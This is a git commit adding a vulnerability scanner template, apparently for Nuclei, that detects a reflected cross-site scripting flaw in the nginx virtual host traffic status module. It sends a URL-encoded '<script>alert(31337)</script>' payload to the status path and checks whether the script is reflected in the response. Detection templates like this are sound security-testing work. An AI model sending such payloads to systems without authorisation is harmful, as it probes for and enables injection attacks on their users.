Nginx virtual host traffic status module XSS

https://github.com/vozlt/nginx-module-vts/issues/174
patch-1
SaN ThosH 2020-07-31 23:18:14 +05:30 committed by GitHub
parent b44f47c502
commit 99d78127ea
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 0 deletions

View File

@ -0,0 +1,21 @@
id: nginx-module-vts-xss
info:
name: Nginx virtual host traffic status module Reflected Cross-site Scripting
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(31337)</script>"
part: body